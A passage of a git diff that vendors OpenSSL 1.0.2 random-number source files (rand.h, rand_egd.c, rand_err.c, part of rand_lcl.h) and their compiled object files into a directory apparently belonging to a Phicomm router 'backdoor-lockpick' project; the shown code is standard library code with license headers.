+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_RAND_H
+# define HEADER_RAND_H
+
+# include <stdlib.h>
+# include <openssl/ossl_typ.h>
+# include <openssl/e_os2.h>
+
+# if defined(OPENSSL_SYS_WINDOWS)
+#  include <windows.h>
+# endif
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# if defined(OPENSSL_FIPS)
+#  define FIPS_RAND_SIZE_T size_t
+# endif
+
+/* Already defined in ossl_typ.h */
+/* typedef struct rand_meth_st RAND_METHOD; */
+
+struct rand_meth_st {
+    void (*seed) (const void *buf, int num);
+    int (*bytes) (unsigned char *buf, int num);
+    void (*cleanup) (void);
+    void (*add) (const void *buf, int num, double entropy);
+    int (*pseudorand) (unsigned char *buf, int num);
+    int (*status) (void);
+};
+
+# ifdef BN_DEBUG
+extern int rand_predictable;
+# endif
+
+int RAND_set_rand_method(const RAND_METHOD *meth);
+const RAND_METHOD *RAND_get_rand_method(void);
+# ifndef OPENSSL_NO_ENGINE
+int RAND_set_rand_engine(ENGINE *engine);
+# endif
+RAND_METHOD *RAND_SSLeay(void);
+void RAND_cleanup(void);
+int RAND_bytes(unsigned char *buf, int num);
+int RAND_pseudo_bytes(unsigned char *buf, int num);
+void RAND_seed(const void *buf, int num);
+void RAND_add(const void *buf, int num, double entropy);
+int RAND_load_file(const char *file, long max_bytes);
+int RAND_write_file(const char *file);
+const char *RAND_file_name(char *file, size_t num);
+int RAND_status(void);
+int RAND_query_egd_bytes(const char *path, unsigned char *buf, int bytes);
+int RAND_egd(const char *path);
+int RAND_egd_bytes(const char *path, int bytes);
+int RAND_poll(void);
+
+# if defined(OPENSSL_SYS_WINDOWS) || defined(OPENSSL_SYS_WIN32)
+
+void RAND_screen(void);
+int RAND_event(UINT, WPARAM, LPARAM);
+
+# endif
+
+# ifdef OPENSSL_FIPS
+void RAND_set_fips_drbg_type(int type, int flags);
+int RAND_init_fips(void);
+# endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_RAND_strings(void);
+
+/* Error codes for the RAND functions. */
+
+/* Function codes. */
+# define RAND_F_RAND_GET_RAND_METHOD                      101
+# define RAND_F_RAND_INIT_FIPS                            102
+# define RAND_F_SSLEAY_RAND_BYTES                         100
+
+/* Reason codes. */
+# define RAND_R_DUAL_EC_DRBG_DISABLED                     104
+# define RAND_R_ERROR_INITIALISING_DRBG                   102
+# define RAND_R_ERROR_INSTANTIATING_DRBG                  103
+# define RAND_R_NO_FIPS_RANDOM_METHOD_SET                 101
+# define RAND_R_PRNG_NOT_SEEDED                           100
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_egd.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_egd.c
new file mode 100644
index 0000000..1b6e501
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_egd.c
@@ -0,0 +1,291 @@
+/* crypto/rand/rand_egd.c */
+/* Written by Ulf Moeller and Lutz Jaenicke for the OpenSSL project. */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/e_os2.h>
+#include <openssl/rand.h>
+#include <openssl/buffer.h>
+
+/*-
+ * Query the EGD <URL: http://www.lothar.com/tech/crypto/>.
+ *
+ * This module supplies three routines:
+ *
+ * RAND_query_egd_bytes(path, buf, bytes)
+ *   will actually query "bytes" bytes of entropy form the egd-socket located
+ *   at path and will write them to buf (if supplied) or will directly feed
+ *   it to RAND_seed() if buf==NULL.
+ *   The number of bytes is not limited by the maximum chunk size of EGD,
+ *   which is 255 bytes. If more than 255 bytes are wanted, several chunks
+ *   of entropy bytes are requested. The connection is left open until the
+ *   query is competed.
+ *   RAND_query_egd_bytes() returns with
+ *     -1  if an error occured during connection or communication.
+ *     num the number of bytes read from the EGD socket. This number is either
+ *         the number of bytes requested or smaller, if the EGD pool is
+ *         drained and the daemon signals that the pool is empty.
+ *   This routine does not touch any RAND_status(). This is necessary, since
+ *   PRNG functions may call it during initialization.
+ *
+ * RAND_egd_bytes(path, bytes) will query "bytes" bytes and have them
+ *   used to seed the PRNG.
+ *   RAND_egd_bytes() is a wrapper for RAND_query_egd_bytes() with buf=NULL.
+ *   Unlike RAND_query_egd_bytes(), RAND_status() is used to test the
+ *   seed status so that the return value can reflect the seed state:
+ *     -1  if an error occured during connection or communication _or_
+ *         if the PRNG has still not received the required seeding.
+ *     num the number of bytes read from the EGD socket. This number is either
+ *         the number of bytes requested or smaller, if the EGD pool is
+ *         drained and the daemon signals that the pool is empty.
+ *
+ * RAND_egd(path) will query 255 bytes and use the bytes retreived to seed
+ *   the PRNG.
+ *   RAND_egd() is a wrapper for RAND_egd_bytes() with numbytes=255.
+ */
+
+#if defined(OPENSSL_SYS_WIN32) || defined(OPENSSL_SYS_VMS) || defined(OPENSSL_SYS_MSDOS) || defined(OPENSSL_SYS_VXWORKS) || defined(OPENSSL_SYS_NETWARE) || defined(OPENSSL_SYS_VOS) || defined(OPENSSL_SYS_BEOS)
+int RAND_query_egd_bytes(const char *path, unsigned char *buf, int bytes)
+{
+    return (-1);
+}
+
+int RAND_egd(const char *path)
+{
+    return (-1);
+}
+
+int RAND_egd_bytes(const char *path, int bytes)
+{
+    return (-1);
+}
+#else
+# include <openssl/opensslconf.h>
+# include OPENSSL_UNISTD
+# include <sys/types.h>
+# include <sys/socket.h>
+# ifndef NO_SYS_UN_H
+#  ifdef OPENSSL_SYS_VXWORKS
+#   include <streams/un.h>
+#  else
+#   include <sys/un.h>
+#  endif
+# else
+struct sockaddr_un {
+    short sun_family;           /* AF_UNIX */
+    char sun_path[108];         /* path name (gag) */
+};
+# endif                         /* NO_SYS_UN_H */
+# include <string.h>
+# include <errno.h>
+
+# ifndef offsetof
+#  define offsetof(TYPE, MEMBER) ((size_t) &((TYPE *)0)->MEMBER)
+# endif
+
+int RAND_query_egd_bytes(const char *path, unsigned char *buf, int bytes)
+{
+    int ret = 0;
+    struct sockaddr_un addr;
+    int len, num, numbytes;
+    int fd = -1;
+    int success;
+    unsigned char egdbuf[2], tempbuf[255], *retrievebuf;
+
+    memset(&addr, 0, sizeof(addr));
+    addr.sun_family = AF_UNIX;
+    if (strlen(path) >= sizeof(addr.sun_path))
+        return (-1);
+    BUF_strlcpy(addr.sun_path, path, sizeof addr.sun_path);
+    len = offsetof(struct sockaddr_un, sun_path) + strlen(path);
+    fd = socket(AF_UNIX, SOCK_STREAM, 0);
+    if (fd == -1)
+        return (-1);
+    success = 0;
+    while (!success) {
+        if (connect(fd, (struct sockaddr *)&addr, len) == 0)
+            success = 1;
+        else {
+            switch (errno) {
+# ifdef EINTR
+            case EINTR:
+# endif
+# ifdef EAGAIN
+            case EAGAIN:
+# endif
+# ifdef EINPROGRESS
+            case EINPROGRESS:
+# endif
+# ifdef EALREADY
+            case EALREADY:
+# endif
+                /* No error, try again */
+                break;
+# ifdef EISCONN
+            case EISCONN:
+                success = 1;
+                break;
+# endif
+            default:
+                goto err;       /* failure */
+            }
+        }
+    }
+
+    while (bytes > 0) {
+        egdbuf[0] = 1;
+        egdbuf[1] = bytes < 255 ? bytes : 255;
+        numbytes = 0;
+        while (numbytes != 2) {
+            num = write(fd, egdbuf + numbytes, 2 - numbytes);
+            if (num >= 0)
+                numbytes += num;
+            else {
+                switch (errno) {
+# ifdef EINTR
+                case EINTR:
+# endif
+# ifdef EAGAIN
+                case EAGAIN:
+# endif
+                    /* No error, try again */
+                    break;
+                default:
+                    ret = -1;
+                    goto err;   /* failure */
+                }
+            }
+        }
+        numbytes = 0;
+        while (numbytes != 1) {
+            num = read(fd, egdbuf, 1);
+            if (num == 0)
+                goto err;       /* descriptor closed */
+            else if (num > 0)
+                numbytes += num;
+            else {
+                switch (errno) {
+# ifdef EINTR
+                case EINTR:
+# endif
+# ifdef EAGAIN
+                case EAGAIN:
+# endif
+                    /* No error, try again */
+                    break;
+                default:
+                    ret = -1;
+                    goto err;   /* failure */
+                }
+            }
+        }
+        if (egdbuf[0] == 0)
+            goto err;
+        if (buf)
+            retrievebuf = buf + ret;
+        else
+            retrievebuf = tempbuf;
+        numbytes = 0;
+        while (numbytes != egdbuf[0]) {
+            num = read(fd, retrievebuf + numbytes, egdbuf[0] - numbytes);
+            if (num == 0)
+                goto err;       /* descriptor closed */
+            else if (num > 0)
+                numbytes += num;
+            else {
+                switch (errno) {
+# ifdef EINTR
+                case EINTR:
+# endif
+# ifdef EAGAIN
+                case EAGAIN:
+# endif
+                    /* No error, try again */
+                    break;
+                default:
+                    ret = -1;
+                    goto err;   /* failure */
+                }
+            }
+        }
+        ret += egdbuf[0];
+        bytes -= egdbuf[0];
+        if (!buf)
+            RAND_seed(tempbuf, egdbuf[0]);
+    }
+ err:
+    if (fd != -1)
+        close(fd);
+    return (ret);
+}
+
+int RAND_egd_bytes(const char *path, int bytes)
+{
+    int num, ret = 0;
+
+    num = RAND_query_egd_bytes(path, NULL, bytes);
+    if (num < 1)
+        goto err;
+    if (RAND_status() == 1)
+        ret = num;
+ err:
+    return (ret);
+}
+
+int RAND_egd(const char *path)
+{
+    return (RAND_egd_bytes(path, 255));
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_egd.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_egd.o
new file mode 100644
index 0000000000000000000000000000000000000000..7703ff8049d693d57fc345094051ef3357d07231
GIT binary patch
literal 3032
zcmbuBU2GIZ9KdILS13^S3SvUU;E^1rMcMR(gpUW)z3#PJb3g(uJ_xSYy@l4ccepoa
z@6@!C<CG0wJ`x{%^Mwb9G4Z1ba0UboXd?RHM`B81B25*vXekAI{{OQ(?Qp#_M*qp|
z%>L&8HS?dHyWwc8twxdv7l}Mg=H56Z<Ye94xP=W{$Wl^IZU<IRtIvL%1f=ech9}i7
zwX-9CwbZ3Mf9=u_{&E<cCG;cywT+;mJBLD90O4Zn*lVFW&G{|nly0BecUcS7NhIc6
z*PUAvr}aBu>7~#0{N28n7pdTC>|HR?!C-NR^QZH*?%W*d2WK}h3ou|_u1}l}Upt41
zpT|ds^Cg>B@BHX|nx87s4>e~Z=FB*^T<lyd6sf|-M@W9^Mf%uqAV1}&-{q&4&~L`p
zfsgzRJ3l1_-dqji@lT@Rp9((&j<0~1gZD}h;Uj!p(n5n$VEYAF_hBuR9jO6^D;w-E
zCn2$>iI_B_o7Y&JLNQybN|(kTnT_hFGKO>4I0B|>ex@cf0?tNo4Rh%hih)CK0~ult
zmI)4O!9nIc*h!fyuR~lyGqGbdl-pMLl`hz3{;^HE84Z^LA9RKWwJp<hqt-OtVcv0W
z#iYr(yr_zfFOPpKIKGORT^@^<N~NfDUu(Jt9s`BDGo=z1BBwbsOnK~QAh0*yzUoKZ
z`X=-ZZoz3SQ_~M##B-oIqtESC_o#c-=T+kZJ2{=sM0k?v6pF*O;Ay;GbuKbc`YZ#r
z9aZ-*&2zZl<5x&~YwOlvV^?=3Ni)GM$_Ax*eRxxby@rRLYF3&zHn|woQT)&vpw&Wa
z-`+)_L`7siXecY(j!3WUBvQ6PT2;TW?k&hw2mYuxw-xK!CO4d@X_r?X_eJI4F@HpE
zJX#x-o8MTV$(!>F+vTFqS63r%*5qbYZj8vmh`cf)H$>z*LRNx#kLPP0_TcMijfqn%
z{vmH}iP!&AhbO~Ne#hOIC%%ebF0PfY_CXUL+nom)zWK<4`H=C2RXDC>zWCU#KgjFh
zb-9oy+go63pkbZLWfOo(ytN8{rV8I#g_~7)ZxxOgU8Q`oRrpX9egZh|17ANo7r@@B
zqJPTMPvBVunLR6ZJee@8{Rzb+JJs!)@lwXJa|n#?9JSKKXpilPs4-(lTidQ^r_rfK
zVo`%cy4s91wfoHjIg(D9eHJBVDw(uQN({rY?PSX6PnmJrn@W;FyO&zTw&DplLfWzt
z#OzO{EznKVxY=izJ$=T$cyGU}Fc+L<1S&L>o}F^@f7R{S3B<MBhnofk?>Q9wM)9n0
z{vJXQ<V&G(eik7Jav2)uYw<$?K^}m{`38ZD`Y#9^>&x}2z(xJD0vGka5V)v6E%0T6
z|3zLsG0)`!UnB5`1RfRmB7yG~_`?DZ!WadoJr(wjzo00b^K*FE#j~8BH=?9-12o<Z
zJ+<AwhmUNlKdw+KONo+*(>PJO(`llZseu722`rhSmI8P0dUjU4_x;I?a==a<uxy$m
z3iDv~82jw_faPWI|GFTU<Cd4-WG%o@QsQR7yH_4IhmTdzuqG|gM9F#%dpv{1Fo{Ec
z1L9qe@;Ef)<u~t{vbd;=QXc<FVCeI|+J`-#&CrX&<3Axn81wkN-zqRs_4|LBKi<Rm
zYf-K~>Vcr>6vll2IPQi4=2C9YH{>K&^!jr9y}&EgZ`At<(>*(^AKG$zUcZX5LGPqj
ukVY>tyu0u_EVoBiUOPafh<`*t-gmp%C*OAt@Q$ct-{=M6-!IoMxBnYpm>QG-

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_err.c
new file mode 100644
index 0000000..55d86ea
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_err.c
@@ -0,0 +1,100 @@
+/* crypto/rand/rand_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/rand.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_RAND,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_RAND,0,reason)
+
+static ERR_STRING_DATA RAND_str_functs[] = {
+    {ERR_FUNC(RAND_F_RAND_GET_RAND_METHOD), "RAND_get_rand_method"},
+    {ERR_FUNC(RAND_F_RAND_INIT_FIPS), "RAND_init_fips"},
+    {ERR_FUNC(RAND_F_SSLEAY_RAND_BYTES), "SSLEAY_RAND_BYTES"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA RAND_str_reasons[] = {
+    {ERR_REASON(RAND_R_DUAL_EC_DRBG_DISABLED), "dual ec drbg disabled"},
+    {ERR_REASON(RAND_R_ERROR_INITIALISING_DRBG), "error initialising drbg"},
+    {ERR_REASON(RAND_R_ERROR_INSTANTIATING_DRBG), "error instantiating drbg"},
+    {ERR_REASON(RAND_R_NO_FIPS_RANDOM_METHOD_SET),
+     "no fips random method set"},
+    {ERR_REASON(RAND_R_PRNG_NOT_SEEDED), "PRNG not seeded"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_RAND_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(RAND_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, RAND_str_functs);
+        ERR_load_strings(0, RAND_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..05a1b798181c8dd5c6b308d61d41473e96c7f109
GIT binary patch
literal 1368
zcmbtS-AV#c5T0!<t%QE)A~3?bsi+Rx4^bCkm~|6f2!c1Uth!m0tLz>@yQo+2QF;WS
zm*_E!?z*WN_nh^3GJ+bIotbavo1b&eQ|{ty%rHQT0mm?iBnnU*8~B;Nn}Ik?!~4wg
z#|xZivq#DGLaFKUX7Z5jveb6^pxF=8k2@)r+S>?Vh#+?sbsY8lvH)1NOPGmDvJe<B
z9`azcW{pHV8tdRdgfEGI#QjZZhX}lVj><DfZb&mIODaS&oK6AJHTzo(V-%S%@g3~r
z(I0R+fnkYbIIqkZ?(Era#d184l_8hUTlaOlV&zXRPc5H&w{F!JWs<_uMnhXMzg^>Y
z2^i)F_C|W#X>ni`o7=!jz7MQiuhkqEF}KbghS#<2bGv*e;;P$Z4X@sCJl+Q8Irlbm
zZmet1t~sLlKTHC-bcgy$W<<^KJVdO&*%ibIlkZBTK~6fF)%k1qKZg2O{uXknW(rjm
z*?&_7(U<+D-B&O*wV?)zFL@H8KJ?m#?jB>wPol31?W)QZ22@k$cSMrDm(DL@9=+;}
z$d~3-47w<QNwhSl<V$>1Z=!VRgVGBOOrfP3I-fB8?uha%`ma);h=4<64!u$Qo=B{Q
JnSrD8zW{1^P;LMK

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_lcl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_lcl.h
new file mode 100644
index 0000000..f9fda3e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_lcl.h
@@ -0,0 +1,158 @@
+/* crypto/rand/rand_lcl.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
